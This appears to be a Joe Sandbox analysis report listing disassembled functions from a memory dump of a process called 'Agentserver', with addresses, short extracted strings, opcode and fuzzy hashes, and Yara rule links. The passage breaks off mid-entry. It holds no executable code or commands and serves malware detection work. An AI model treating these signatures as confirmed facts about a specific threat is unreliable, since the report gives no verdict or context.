Function 00007FF848E8E91B Relevance: 5.1, Strings: 4, Instructions: 123COMMON

Download Yara Rule

Strings

J, xrefs: 00007FF848E8EA47
j, xrefs: 00007FF848E8ED60
{, xrefs: 00007FF848E8E92F
", xrefs: 00007FF848E8FEF2

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: "$J$j${
API String ID: 0-387960718
Opcode ID: 0550f0b858a7c6e1f08a9406c886500955e30273c3df8737a3006b530cf8c475
Instruction ID: 4300f0dabe7072a798ffeee48d6363949d07667160b3630269c734f63320b18b
Opcode Fuzzy Hash: 0550f0b858a7c6e1f08a9406c886500955e30273c3df8737a3006b530cf8c475
Instruction Fuzzy Hash: AE51A570D096698FEB68EF14C8947EDB7B1BF55345F4001EAD44DA7281CB386A84CF45

Function 00007FF848E8EDB1 Relevance: 3.8, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

$, xrefs: 00007FF848E8EDBB
8, xrefs: 00007FF848E8F633
i, xrefs: 00007FF848E8F6B6

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: $$8$i
API String ID: 0-852347586
Opcode ID: 41a4ad9cb5fa36c7e1583a0dfebd3b9fc05d047e19755708051e6dea9b0b436b
Instruction ID: 3a75cc044778d643265a55b250f557e891ca4170d62adcf51e748eedef9d3c84
Opcode Fuzzy Hash: 41a4ad9cb5fa36c7e1583a0dfebd3b9fc05d047e19755708051e6dea9b0b436b
Instruction Fuzzy Hash: 4631CE70D0866A8FEB68EF14C8947ADB7B1FF55341F5041EA940EA3291CB386E85CF48

Function 00007FF848E900CD Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

'W_H, xrefs: 00007FF848E8FCCF

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: 'W_H
API String ID: 0-813103255
Opcode ID: 2deb70cbacbabc24e1212dcbca24d1ca0301a9ffb4a778a63655f006d57ff739
Instruction ID: ad54c00ff0d6832a1b5d0ab38d30bdb8030b3e9b68463cc82c12b6c7e31a3ab4
Opcode Fuzzy Hash: 2deb70cbacbabc24e1212dcbca24d1ca0301a9ffb4a778a63655f006d57ff739
Instruction Fuzzy Hash: 383106B1D08A5A8FEBA8EB1488557EDB7A1FB54341F4041FAC50DA3281DF342A848F19

Function 00007FF848E8FC9E Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

'W_H, xrefs: 00007FF848E8FCCF

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: 'W_H
API String ID: 0-813103255
Opcode ID: 579b4f1f67e2e554bad444e698bdfa309d431808792b0f451313a7ae1b37e771
Instruction ID: 467246427e95abe5ed5e9547c5758bec4a2671e504f34e32829948ee644e5844
Opcode Fuzzy Hash: 579b4f1f67e2e554bad444e698bdfa309d431808792b0f451313a7ae1b37e771
Instruction Fuzzy Hash: CE21F9B1D18A599FDBA8EF2888557A8B7E1FF54341F5040FAC50DE3282DE346A818F19

Function 00007FF848E8EE64 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

9, xrefs: 00007FF848E8EEC0

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 73cdd4f3af3f73009a0879705e0baee2d516d6c4f5f1eb5a29d6bca3c7016b03
Instruction ID: 336e48ece4b5af8068290288cc8e37cfee5c9b538f060bb025a641213997c9cc
Opcode Fuzzy Hash: 73cdd4f3af3f73009a0879705e0baee2d516d6c4f5f1eb5a29d6bca3c7016b03
Instruction Fuzzy Hash: 7E11DA71D0896A8FEBA0EE18CC447E9B3F1FB94342F4001A6D40DE3291DB349A849F44

Function 00007FF848E8DA99 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49eb9fda3fb7a20f19a9356f0c02d1f2e994b856f1224ff6f051a8b96d0b5e9c
Instruction ID: 8e6bd6f3362a9c9d8cd971f358662acb3cb9cb3daa5d1efaf30e9b51e9f88938
Opcode Fuzzy Hash: 49eb9fda3fb7a20f19a9356f0c02d1f2e994b856f1224ff6f051a8b96d0b5e9c
Instruction Fuzzy Hash: 06E14C31E19A599FEB98EB68D4957BCB7B1FF58340F4441BAD00DD3292CB38A880CB55

Function 00007FF848E81698 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e849b61f19a90ef1d69b12c4ad01b30a4028205dabe496e54821e2e41e580c3
Instruction ID: a9d3c770e67abda486b656848f837e04e0d3e07190d436337d8546db483b9dd8
Opcode Fuzzy Hash: 4e849b61f19a90ef1d69b12c4ad01b30a4028205dabe496e54821e2e41e580c3
Instruction Fuzzy Hash: F9819C31A0CA8A8FDB59EE1C88556BD77E2FF98740F5441BAE44DC3286CF35AC028785

Function 00007FF848E92AA1 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fb5b207613a7a88c44a5242b2a14d7de47435265b5b9ff3da1bc4faeb24374
Instruction ID: a5054c1b81c6b37b0aeb4a6324d76bda3f7fae73613ee695a8d89e4e3e8d783e
Opcode Fuzzy Hash: 32fb5b207613a7a88c44a5242b2a14d7de47435265b5b9ff3da1bc4faeb24374
Instruction Fuzzy Hash: F491C170D08A1D8FEBA4EBA8C8957EDB7B1FF59344F5041AAD00DE3292DF7469848B44

Function 00007FF848E806C0 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b24bb219c98e7cb04e771f5bbcbb5e3d13446b999b4576014d56795a93a9ac
Instruction ID: 21eda1e5ce9170b31263a6faffe66d8eff669a79af6a08b2b11375faecd8f68e
Opcode Fuzzy Hash: 64b24bb219c98e7cb04e771f5bbcbb5e3d13446b999b4576014d56795a93a9ac
Instruction Fuzzy Hash: D3612552E0F9C68FE215B67C68091BD7BD0FF52790F4942F7C048870DBDE39984686AA

Function 00007FF848E93D35 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e92155cca72fe01c2e4fb72efe0f7a6c237b283cb1fd6812bfc4c3838363f5d
Instruction ID: 5a06157713c5de17d88fa6f6ac5f4d1a5faa069f06e7031517efcc3da24d68a4
Opcode Fuzzy Hash: 9e92155cca72fe01c2e4fb72efe0f7a6c237b283cb1fd6812bfc4c3838363f5d
Instruction Fuzzy Hash: 2491F770D1861D9EEBA4EBA8C8557ECB7B1FF58344F1051AAD00DE32A2DB786984CB05

Function 00007FF848E8AF38 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf16cf2c164705dcd352ae7547149e4dda771a85a72af4147b0760e63fea4ca
Instruction ID: 7c6295cd57e3fc05caa6bb313f187dbb98e04c2d46e02765fafd023112eb162c
Opcode Fuzzy Hash: 6cf16cf2c164705dcd352ae7547149e4dda771a85a72af4147b0760e63fea4ca
Instruction Fuzzy Hash: C661E270E1CA1D8EEB94EB99D455AADB7F1FF5A340F90117AD00DE3282CF3468859B48

Function 00007FF848E81D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca91069a979462f9b3253dc83cd494db0f70b56469d8a479bb8002f11bc3950
Instruction ID: 149939205f819dbadc7b5028da94ac1baf7c9c55c736d031a2faf58594db6b15
Opcode Fuzzy Hash: 4ca91069a979462f9b3253dc83cd494db0f70b56469d8a479bb8002f11bc3950
Instruction Fuzzy Hash: B951C331A1CB898FDB48EE1888546BA77E2FF98341F54457ED44AC7292DF35E802CB85

Function 00007FF848E8C91D Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0b7c91e00e6c93ce0128a5263e2b0a7ff2fb5f309f36125379cd165ccbf234
Instruction ID: a3e70f27229dd79b784e25514254e4e0277f767f165be2af2692e6fc17325198
Opcode Fuzzy Hash: 9f0b7c91e00e6c93ce0128a5263e2b0a7ff2fb5f309f36125379cd165ccbf234
Instruction Fuzzy Hash: 1E512470D08A1D8EEB94EBA8C4987FDB6B1FF58344F5001BAD409E7282DF786984CB44

Function 00007FF848E83271 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188bf1b97a76898a1a73ae05faac31a577a4bd9e29bae4ba7f70860be721a3e0
Instruction ID: b395ffdfe9a70e1c17cac92ac0bfe8da19bd7804475f7ffea7638b3d797d1d5b
Opcode Fuzzy Hash: 188bf1b97a76898a1a73ae05faac31a577a4bd9e29bae4ba7f70860be721a3e0
Instruction Fuzzy Hash: A4512670D0861D8FEB54EBA8D854AEDBBB1FF58350F90207AD009E7292DF38A944CB14

Function 00007FF848E93BFB Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24476bcb314f2f2b1566f111cadaeefbceee1c22beef6cd3cc543d327d4e492e
Instruction ID: 22a3c7268a6f5d5960cc6cdac3126ed1d5e479ddc9972122cf322b17fe3222fb
Opcode Fuzzy Hash: 24476bcb314f2f2b1566f111cadaeefbceee1c22beef6cd3cc543d327d4e492e
Instruction Fuzzy Hash: 03412636B0C9456EE705BBACE85A1FA7BA0FF463B6F0404B7D108C7062DA746449C7B5

Function 00007FF848E953A0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32a9065ebd745db3f3bdd9b8badfbc7c6e14d0b49a6bcac9f00c5da84f4ca8d
Instruction ID: aab6df0c6ecb136fa80df81c94626527d358123d9515117511964f73ac1b176f
Opcode Fuzzy Hash: c32a9065ebd745db3f3bdd9b8badfbc7c6e14d0b49a6bcac9f00c5da84f4ca8d
Instruction Fuzzy Hash: 3B412E70D1891D8FEB94EBA8D499AADBBF1FF59341F10016AD00DE3296CF756885CB40

Function 00007FF848E82145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e5302ff229e178a6ab08ea1b61f85508a55751318b4b4bfb1540986c034aff
Instruction ID: aa99ea498a11ad068a7a3481195b8cc0994dd596766d30e29fdfb477fb033a87
Opcode Fuzzy Hash: 73e5302ff229e178a6ab08ea1b61f85508a55751318b4b4bfb1540986c034aff
Instruction Fuzzy Hash: 2F412331E1DA9A4FE355E73898451B9BBE0FF46390F8841BAD00DC7193DF38A8418355

Function 00007FF848E8363B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9798ae23707b8629d272becb5bc9918966c1fc99a7160acbdbf08ffbb2852b5f
Instruction ID: 7aba624095e3ccd791333601d3644b944b6513d6cec481d3c3cdc03f93bd502f
Opcode Fuzzy Hash: 9798ae23707b8629d272becb5bc9918966c1fc99a7160acbdbf08ffbb2852b5f
Instruction Fuzzy Hash: 6E419C31E1D94A9FEB88EB2CD8556BDBBE1FF59390F8411B9D009D3292DF3468008714

Function 00007FF848E96225 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b46e9e038aabdce3d6b469c5e30eb11d9ae2fb5e4a9553c606bf94ce6adb396
Instruction ID: 3b418dceb7ccd6b1b4da6987416ff55d8b44d01bcc1af076d600602e0fa156a4
Opcode Fuzzy Hash: 1b46e9e038aabdce3d6b469c5e30eb11d9ae2fb5e4a9553c606bf94ce6adb396
Instruction Fuzzy Hash: D2413770D0C619DEEBA4EBA4C8547ADB6B1FF49354F1041BAD00DE32A2DFB86984CB05

Function 00007FF848E9538D Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827d6a130ea5bb7d98773021ad47ffeb53bf5f02cf9febc0ddb1797de596ec4f
Instruction ID: eb628cc959025482a5091e248441b1febf549e57feaa2445d2838c74b760a721
Opcode Fuzzy Hash: 827d6a130ea5bb7d98773021ad47ffeb53bf5f02cf9febc0ddb1797de596ec4f
Instruction Fuzzy Hash: 44412B70D0CA5D8FEB98EBA8D855BADBBF1FF59341F00016AD00DE3296DB7468858B40

Function 00007FF848E8CA9D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae41144bd7c448c71de161ce5770405996ec0f250102376cfb043f99f2bc1b12
Instruction ID: 339bbd9b0839c4db25a1daf124c8223315b9056cc43f0ce47d95ebaa76f71bb0
Opcode Fuzzy Hash: ae41144bd7c448c71de161ce5770405996ec0f250102376cfb043f99f2bc1b12
Instruction Fuzzy Hash: ED31D272A8D95B5FE79ABA69F4000FC3760FF463A1F485577D00DCA083DF38654886A8

Function 00007FF848E80805 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4fc4bc415d052fd0e201b470cd061962a95a334ca9ab67bd7dcf0b31cac170
Instruction ID: 4105c6b59994610089e702e1e756a45dd321ccab4c34e4b68a2d30411b73dfa3
Opcode Fuzzy Hash: 6d4fc4bc415d052fd0e201b470cd061962a95a334ca9ab67bd7dcf0b31cac170
Instruction Fuzzy Hash: F92149A2E4D9869FE318B77CA85A1FD77D0FF113A4F484173D048CA083EE34A08682E5

Function 00007FF848E8B06D Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8a0efc2c5f4835935e90c85e40ea7956331e8bdc95aa0ef80e6c97c0b30768
Instruction ID: 47a6926fcdc70825e13d384577fffe52c8443dc2fe67e03860fda935c8714a14
Opcode Fuzzy Hash: 1a8a0efc2c5f4835935e90c85e40ea7956331e8bdc95aa0ef80e6c97c0b30768
Instruction Fuzzy Hash: 6521F172E1C94A8FE741FB2898591BEBBE0FF96391F8444B6C418E7092EF3464528744

Function 00007FF848E97B8D Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6959a6c8697b5d37c9fe9d3fefb6ec0cc18997f1f3aacc8fd6d512a7da4d20e
Instruction ID: 54148d77c13f8b6072c7c5282b3cc67e7fcadd4c7edf1910e6249f2e60be0210
Opcode Fuzzy Hash: e6959a6c8697b5d37c9fe9d3fefb6ec0cc18997f1f3aacc8fd6d512a7da4d20e
Instruction Fuzzy Hash: F111BE7084D54A5FEB45FF6488596F97BE1FF19349F0000BAD409C7192EB79614AC744

Function 00007FF848E8A6E1 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85108720fcbbf7c93b60b8f7198e46ca79ae9764ccd9b82d690c128868c9e9c
Instruction ID: 9180af61907aeb6abdeb3bc5e4a804e26be5140bf9bcadef0903770556baea68
Opcode Fuzzy Hash: e85108720fcbbf7c93b60b8f7198e46ca79ae9764ccd9b82d690c128868c9e9c
Instruction Fuzzy Hash: BA215C7091864D8FDB89EF18C899AAD3BF0FF28345F4105AAE81DC7265DB35E490CB81

Function 00007FF848E8346F Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fca95379afff563b1c7e171dc96eb4ff64c23ccb423a528f0d13a1ee7061168
Instruction ID: 91692ac47327a09b137d8a971fed530edcb70b50acdd2b9cfbc427d768496926
Opcode Fuzzy Hash: 9fca95379afff563b1c7e171dc96eb4ff64c23ccb423a528f0d13a1ee7061168
Instruction Fuzzy Hash: F9215E3084E68A8FD753AB7888586A97FF0FF47351F0905EAD448CB062DB389945C721

Function 00007FF848E92830 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317a23607ec5188db77987c83cc9c9676f83c22f8c565fb64d14c14aa45f74bf
Instruction ID: 28cc187a270327cd3920fe09f59520d1dc3d705f59c25ea2c78241bcee27e93d
Opcode Fuzzy Hash: 317a23607ec5188db77987c83cc9c9676f83c22f8c565fb64d14c14aa45f74bf
Instruction Fuzzy Hash: 6C218C3080E7C95FDB56AB7488696B87FB0AF16244F1A04EFD459CA0A3DB695445C312

Function 00007FF848E80A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cee18b011609456d73c6e2edaf21b853476340b9ec03d7512ec86f1c650582b
Instruction ID: cd6a9b9f5fcb2ec19985a29547585c0c32d2014accbd5877d0f8e6d62d33b79d
Opcode Fuzzy Hash: 3cee18b011609456d73c6e2edaf21b853476340b9ec03d7512ec86f1c650582b
Instruction Fuzzy Hash: BB116A31E1994E9EE790FB6898492BE7BE0FF59390F8005B6D419C71A2EF38A5448760

Function 00007FF848E96DD1 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4a04b37d11263a5af309c267fd942143066651da4100f78db128a531aef0e8
Instruction ID: a982958f092d231df82fe982158e4b9ef8d7ecbfbf3c89bb515eff712ed602fd
Opcode Fuzzy Hash: ab4a04b37d11263a5af309c267fd942143066651da4100f78db128a531aef0e8
Instruction Fuzzy Hash: BB11897090CA4E8FEB98EF68C4592BE7BA0FF18345F0005BAD409C21A2DB74A5448741

Function 00007FF848E94849 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8845692e3f9d268f50f959e9c3f09d7473bb9e30c4aaaa0283cef63fd35ce6b
Instruction ID: 3715e8c3f48746122002ebb6f6da30ed1ef21ca0c567512c07276c5fcaf8857e
Opcode Fuzzy Hash: c8845692e3f9d268f50f959e9c3f09d7473bb9e30c4aaaa0283cef63fd35ce6b
Instruction Fuzzy Hash: 9321CD30D0CA8E9FEB99EF6884592BD3BB0FF19349F0105BAE009C3292CB78A440C741

Function 00007FF848E94D85 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb0566d1064b651abd42cda8ceba89fb00e2969005b648fc35b90526d5000a1
Instruction ID: a2cefc387b1d381b83a3a50efb26a17283ca86635ae8edd502c3b02f75d62b25
Opcode Fuzzy Hash: 5cb0566d1064b651abd42cda8ceba89fb00e2969005b648fc35b90526d5000a1
Instruction Fuzzy Hash: EE11C175D0EA898FEB99EAA488652B87BA0FF15348F0400FED00DC6592DF796854C706

Function 00007FF848E96F15 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6bbcdb6064e9343fd816335e9d2470fda912e006d5fb55ea7dadabe91c5e55
Instruction ID: 7f61800883c1d6cd650a59939d8102f650a48dfd3e98797e29db8768ef3e0eb6
Opcode Fuzzy Hash: 5c6bbcdb6064e9343fd816335e9d2470fda912e006d5fb55ea7dadabe91c5e55
Instruction Fuzzy Hash: 7011BF71D0DA8ACFEB99EEA488692B87AA0FF15344F0400FFD419C65A2DF75A404C706

Function 00007FF848E948E5 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01f486212fb3fe35db4597c0d3e800e3cb807fae0bff9dde97873e1f4d10a8a
Instruction ID: 1fd8d84da5f88d5cd2a7da540c0906202db1d26dc4fbded181fd00be5808655a
Opcode Fuzzy Hash: d01f486212fb3fe35db4597c0d3e800e3cb807fae0bff9dde97873e1f4d10a8a
Instruction Fuzzy Hash: 42116A3090DA8E9FEB98EF68C4692B97BA0FF58349F0005BAD409D7192DB74A540C741

Function 00007FF848E8112D Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05be5ff6478239939bd3c00cbcba10378e4c9af3075784ed935f039a82529106
Instruction ID: b8c1d8690402ab7f2fc7b58fb4ffe0383add328783c1bf098622e3c360f414ba
Opcode Fuzzy Hash: 05be5ff6478239939bd3c00cbcba10378e4c9af3075784ed935f039a82529106
Instruction Fuzzy Hash: D3116D70D1DA4E8EEB99EB2888592BD7BE0FF5A391F4005BAD40AD71D2DF3A6440C744

Function 00007FF848E8CB20 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f49afa7eeded56e216b38f602a05a900f36e3a1ba6ee5aa905db24ac764698
Instruction ID: d8b5b332a125213129d85a6a97ad27c3fa7874f2a362bc7db89051b67fea9004
Opcode Fuzzy Hash: 75f49afa7eeded56e216b38f602a05a900f36e3a1ba6ee5aa905db24ac764698
Instruction Fuzzy Hash: CD11883090CA4E8EEB8AEB2498182BD3BB0FF0A381F4408BAD409C71A2DF346644C744

Function 00007FF848E8B9DB Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

